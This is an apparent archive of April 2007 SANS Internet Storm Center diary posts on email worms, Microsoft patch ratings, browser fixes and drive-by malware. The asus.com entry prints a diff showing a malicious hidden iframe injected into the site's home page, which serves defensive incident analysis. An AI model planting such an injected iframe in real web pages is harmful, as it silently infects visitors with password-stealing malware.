Remember Bagel? It was just a couple years ago when a very similar set of viruses was making the round. Bagel arrived as a plain .exe, waiting for a gullible user to double click and execute it. It later, very much like the new "Storm" virus, used an encrypted ZIP file.
Back with Bagel, we managed to get a hold of some of the web logs from sites Bagel used to "call home". In analyzing these logs we found a large overlap in users infected by various Bagel variants. In short: The same users are getting infected over and over again by the "malware of the day".
I think these viruses offer a sad glimpse into the current state of Internet security. Not only have users still not learned to "never click on an executable". Neither have network administrators learned to filter executables. When was the last time you received a legitimate executable as an attachment? (NO! IE7.exe was not one of them!).
Lastly, "Storm" is yet another hint that current AV software is no longer an adequate means to protect yourself from current and relevant threats. Subscription based business models direct mainstream consumer anti-virus systems into a dead end of signature updates, which haven't work at least since Zotob showed up.
As a reader of this post, you are unlikely to be able to do anything about the current sad state of anti-virus. But you may be able to block .exe files on your mail server. Don't ask me for subject or file names. Block executables!
0 Comments
whois.internic.net outage?
Joel Esler
Handler on Duty
http://handlers.sans.org/jesler
0 Comments
New Worm making the rounds?
Apparently it indicates itself as a "Patch" for the "New worm" that is going around (whatever that may be, there are just so many I could choose from!)
The Subject of the email (that we have seen so far) says "Worm Alert!".
It has two attachments, one being an image with "panic-worded text", andt he other is a password protected zip file, whose password is revealed in the image.
Clamav will not pick up the zip file, but it will pick up the .exe inside of it, and apparently names it "Trojan.Small-1641" (That's so descriptive!)
Joel Esler
Handler of the Day
http://handlers.sans.org/jesler
0 Comments
Oracle Critical Patch Update Pre-Release Announcement
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2007.html
"This Critical Patch Update contains 37 security fixes across all products."
So, if you are running Oracle, it's that time of the month again!
Joel Esler
Handler of the Day
http://handlers.sans.org/jesler
0 Comments
Opera 9.20
A cut and paste of the "Security" section says:
Security
- Fix for character encoding inheritance issue with frames, which could enable cross-site scripting. See the advisory.
- Fixed an issue regarding handling of FTP PASV response, as reported by Mark at bindshell.net
- XMLHttpRequest now treats separate ports on the same server as a different server. Issue reported by Egmont Koblinger.
- Fixed an issue where scripts could continue to run after leaving the page, as reported by Herrmann Manuel.
- Skandiabanken.no's message about successful certificate installation is now shown.
Joel Esler
Handler of the Day
http://handlers.sans.org/jesler
0 Comments
Mailbag
- ICQ: should have updated itself by now, if not, make sure it did.
- AIM: make sure to upgrade to the latest greatest
--
Swa Frantzen -- NET2S
0 Comments
Microsoft black Tuesday patches - April 2007
Overview of the April 2007 Microsoft patches and their status.
Note there was an out of cycle patch for the ANI vulnerability that we reported on earlier and that same patch is included here once again for completeness.
# | Affected | Contra Indications | Known Exploits | Microsoft rating | ISC rating(*) | |
---|---|---|---|---|---|---|
clients | servers | |||||
MS07-017 rerun - out of cycle |
Multiple vulnerabilities, leading to privilege escalation, DoS and remote code execution. Replaces MS06-001 and MS05-053 and MS05-002 on windows 2003 |
|||||
Windows GDI. CVE-2006-5758 CVE-2007-1211 CVE-2007-1212 CVE-2006-5586 CVE-2007-0038 CVE-2007-1215 CVE-2007-1213 |
KB 925902 Realtek HD audio control panel |
Actively exploited SA 935423 |
Critical | PATCH NOW | Important |
|
MS07-018 | Remote code execution and XSS scripting |
|||||
MCMS (Microsoft Content Management Server) CVE-2007-0938 CVE-2007-0939 |
KB 925939 |
No known exploits | Critical | Important | Critical |
|
MS07-019 | Memory corruption leading to remote code execution | |||||
UPnP (Universal Plug and Play) CVE-2007-1204 |
KB 931261 |
PoC available in for pay program |
Critical | Critical | Critical(**) | |
MS07-020 | URL parsing error leads to remote code execution | |||||
Microsoft Agent CVE-2007-1205 |
KB 932168 |
No known exploits | Critical | Critical | Important |
|
MS07-021 | Mulitple vulnerabilities leading to remote Code execution, privilege escalation and DoS |
|||||
CSRSS (Windows Client/Server Run-time Subsystem) CVE-2006-6696 CVE-2007-1209 CVE-2006-6797 |
KB 930178 |
Known exploits since Dec 15th, 2006. MSRC blog |
Critical | PATCH NOW | Critical |
|
MS07-022 | Buffer overflow leading to privilege escalation | |||||
Windows Kernel CVE-2007-1206 |
KB 931784 |
Details discussed publicly |
Important | Important | Important |
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
- We use 4 levels:
- PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
- Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
- Important: Things where more testing and other measures can help.
- Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
- The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
- The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
- Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
- All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.
--
Swa Frantzen -- NET2S
0 Comments
Pump and Dump reporting
Due to the global nature of this spam one needs to have a list of which address to report to.
USA: SEC:
- SEC wants your stock related spam
- Forward the spam to enforcement(AT)sec.gov
- You get a standardized reply for every report, typically during the next business day
- poststelle-ffm(AT)bafin.de
- ASIC has a form, way too impractical for dealing with individual spam messages
- info(AT)asx.com.au
If you have confirmed and working responsive addresses for other stock exchanges, please let us know.
Links:
http://en.wikipedia.org/wiki/Pump_and_dump
http://www.sec.gov/complaint.shtml
Thanks to our readers Axel and more for reporting in on this.
--
Swa Frantzen -- NET2S
0 Comments
Spam volume by category and year
-- William Stearns
0 Comments
movie.exe spammed
Thanks to Mike for submitting the first sample of this critter!
0 Comments
Not so funny.php
The first file, commonly included per IFRAME, contains a file part named "in.php?adv=1". This file contains an encoded blob of JavaScript, which is not reliably detected by AV (from the scanners I have at hand to verify, only Kaspersky, FSecure and McAfee seem to recognize it at all). Once manually decoded, AV detection improves somewhat, but is still leaky. The decoded blob reveals a bunch of "friendly" little code snippets:
1. Exploit-Byteverify (a quite wizened Java exploit)
2. An Exploit for MS06-014, with the code lifted almost in verbatim off the corresponding Metasploit Module
3. A copy of the MS06-057 WebViewFolderIcon.SetSlice exploit, artfully rendered to avoid detection
If either of these is successful, the exploit downloads and runs the mentioned "funny.php?adv=1" files, which invariably turn out to be Trojan Downloaders or worse. The funny.php thingies are apparently refreshed frequently enough to keep AV coverage low to nonexistent.
While the three exploits are not at all lethal on a well patched PC, the prevalence and endurance of these not-so-funny PHPs suggests that there are still far too many PCs out there that fall for this sort of attack. We have informed the two affected ISPs in Germany and Malaysia, lets see who has staff on duty on an Easter weekend...
0 Comments
New MS DNS Vulnerability creeping up?
We will keep you posted as things progress. I will be sending on what we have discovered as well to MS tomorrow. It is 0130EST right now in the US, I will be passing the findings on to the other Handlers for review and input later this morning.
0 Comments
asus.com exploited
In the past days a handful of readers had sent us notes that asus.com was compromised. We unfortunately could not find anything wrong in the html at all.
Today the kaspersky blog had an entry about a ANI exploit loaded via an iframe at asus.com.
So we fetch a new copy, still nothing to be seen. Until Johannes suggested asus.com might be load balanced, and yes indeed it seems it is using DNS load balancing:
$ dig asus.com a
; <<>> DiG 9.2.3 <<>> asus.com a
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19075
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 0
;; QUESTION SECTION:
;asus.com. IN A
;; ANSWER SECTION:
asus.com. 14400 IN A 195.33.130.151
asus.com. 14400 IN A 205.158.107.130
;; AUTHORITY SECTION:
asus.com. 14400 IN NS dns3.asus.com.
asus.com. 14400 IN NS dns7.asus.com.
;; Query time: 18 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Fri Apr 6 23:33:01 2007
;; MSG SIZE rcvd: 96
Fetching a copy of the home page of both servers, and comparing the resulting page yields:
(line breaks added to make page easier to read)
$ diff index.html index.html.1
55c55
<
</table>
---
>
</table><iframe src=http://[DELETED].com/app/helptop.do?id=ad003
width=100 height=0></iframe>
Just goes to learn that a load balanced site is a pain to investigate if only some of the servers are affected.
The script at the time we looked at it was obfuscated and leads to a VBscript, that's up to no good pointing to another obfuscated javascript and a executable cloaked as a jpg file.That file gives following over at virustotal:
Antivirus | Version | Update | Result |
---|---|---|---|
AhnLab-V3 | 2007.4.7.0 | 20070406 | - |
AntiVir | 7.3.1.48 | 20070406 | TR/Drop.Ag.344576.B |
Authentium | 4.93.8 | 20070406 | Possibly a new variant of W32/PWStealer.gen1 |
Avast | 4.7.936.0 | 20070406 | Win32:Tibs-ADO |
AVG | 7.5.0.447 | 20070405 | - |
BitDefender | 7.2 | 20070406 | - |
CAT-QuickHeal | 9.00 | 20070406 | (Suspicious) - DNAScan |
ClamAV | devel-20070312 | 20070406 | - |
DrWeb | 4.33 | 20070406 | - |
eSafe | 7.0.15.0 | 20070406 | suspicious Trojan/Worm |
eTrust-Vet | 30.7.3546 | 20070406 | Win32/NSAnti |
Ewido | 4.0 | 20070406 | - |
F-Prot | 4.3.1.45 | 20070404 | W32/PWStealer.gen1 |
F-Secure | 6.70.13030.0 | 20070406 | - |
FileAdvisor | 1 | 20070407 | - |
Fortinet | 2.85.0.0 | 20070406 | suspicious |
Ikarus | T3.1.1.3 | 20070406 | MalwareScope.Worm.Viking.3 |
Kaspersky | 4.0.2.24 | 20070406 | Trojan-PSW.Win32.OnLineGames.kw |
McAfee | 5003 | 20070406 | New Malware.bc |
Microsoft | 1.2405 | 20070406 | - |
NOD32v2 | 2171 | 20070406 | - |
Norman | 5.80.02 | 20070405 | - |
Panda | 9.0.0.4 | 20070406 | Suspicious file |
Prevx1 | V2 | 20070407 | - |
Sophos | 4.16.0 | 20070406 | Mal/EncPk-F |
Sunbelt | 2.2.907.0 | 20070403 | - |
Symantec | 10 | 20070406 | - |
TheHacker | 6.1.6.085 | 20070404 | - |
VBA32 | 3.11.3 | 20070406 | Trojan-PSW.Win32.Nilage.ara |
VirusBuster | 4.3.7:9 | 20070406 | - |
Webwasher-Gateway | 6.0.1 | 20070406 | Trojan.Drop.Ag.344576.B |
File:
Name | next3.png |
---|---|
Size | 100539 |
md5 | 42a248b8634da52d6044f87db9a8d794 |
sha1 | cf612836be3c763ab9dc2c9afc0ccc112f2c2a04 |
Date scanned | 04/07/2007 00:09:16 (CET) |
Password stealer it seems, same old goal.
I've not seen an ANI exploit in there right now, but we can be easily looking at something that's dynamic in some other way as well.
--
Swa Frantzen -- NET2S
0 Comments
iPod Linux virus PoC
http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2007-040516-4947-99&tabid=2
http://www.viruslist.com/en/weblog?weblogid=208187356
0 Comments
Microsoft April Security Bulletin Advance Notification
We've got four new bulletins coming out with a top severity of Critical and a requirement for rebooting.
Of note is the news that they will also be releasing a number of high priority non-security updates as well though no further information is available till next week.
http://www.microsoft.com/technet/security/bulletin/advance.mspx
0 Comments
Is WEP dead yet? Should it be?
0 Comments
Various Vista Concerns
0 Comments
telnetd deja vu, this time it is Kerberos 5 telnetd
References:
http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-001-telnetd.txt
https://rhn.redhat.com/errata/RHSA-2007-0095.html
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=229782
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0956 (not live yet)
0 Comments
Microsoft Patch Maybe Causing Some Problems
support.microsoft.com/kb/935448/
Other possible issues have been reported and are being investigated. Microsoft is asking anyone having problems after installing the patch to contact them at Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for the support relating to Microsoft Security Updates.
support.microsoft.com/
0 Comments
* Microsoft out of cycle patch
Overview of the out of cycle patch.
# | Affected | Contra Indications | Known Exploits | Microsoft rating | ISC rating(*) | |
---|---|---|---|---|---|---|
clients | servers | |||||
MS07-017 | Multiple graphical format vulnerabilities. Replaces MS06-001 and MS05-053 and MS05-002 on windows 2003 | |||||
Windows all versions CVE-2006-5758 CVE-2007-1211 CVE-2007-1212 CVE-2007-0038 CVE-2007-1215 CVE-2007-1213 |
No known problems SA 935423 KB 925902 |
Actively exploited |
Critical | PATCH NOW | Important |
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
- We use 4 levels:
- PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
- Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
- Important: Things where more testing and other measures can help.
- Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
- The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
- The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
- Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
- All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.
--
Swa Frantzen -- NET2S
0 Comments
Week of Vista bugs is a hoax
Now with April 1st just behind us we were ready for a good laugh with people falling for a hoax or two, but once it's April 2nd, you expect people to resume normal behavior.
Still the first installment of the week of Vista bugs seemed bad on reading it diagonally, but just unfounded and hard to believe at all upon closer inspection.
A friendly contact gave us this link:
https://www.securinfos.info/english/the-week-of-vista-bugs-the-truth.php
Where the perps expose their own hoax.
Just don't believe everything you read on the Internet ... not even on April 2nd and the days after it.
And forget the Week of Vista bugs unless you urgently need a laugh.
--
Swa Frantzen -- NET2S
0 Comments
and in other news
- ie7.0.exe - This started appearing about the same time as the ANI exploits, mainly on web sites, but currently it is being distributed as SPAM messages. Typically an image SPAM message which links to a web page with the exploit. We've seen two names ie7.0.exe and DirectX-10.exe. Detection rates are improving and most AV products should catch this one. Once infected the compromised host will start to SPAM (but since we are all blocking executables, especially in emails this shouldn't be much of a problem).
- PHP scanning - We've had a few reports of PHP scanning coming out of Hong Kong (based on the source addresses). It seems to be fairly generic as it is hitting sites that do not have HP as well as PHP sites.
- DST Part 2 - The original Daylight Savings Time start passed on the weekend. So far the only reports we've had were:
- Church Bells ringing at the wrong time
- A web site providing TV guides was out by an hour causing some initial confusion for one user at least
- April Fools - ISC did not participate in light of the ANI issue (disappointing several handlers who were all geared up to go) , but there were plenty of others who did. We received a number of emails that got a "check the date" reply.
Shearwater
0 Comments
*Microsoft to Release Out-of-Schedule Patch for ANI Vulnerability
The Microsoft Security Response Center blog reports that they "have been working around the clock to test this update and are currently planning to release the security update that addresses this (ANI) issue on Tuesday April 3, 2007."
This is further supported here: www.microsoft.com/technet/security/bulletin/advance.mspx
0 Comments
0 Comments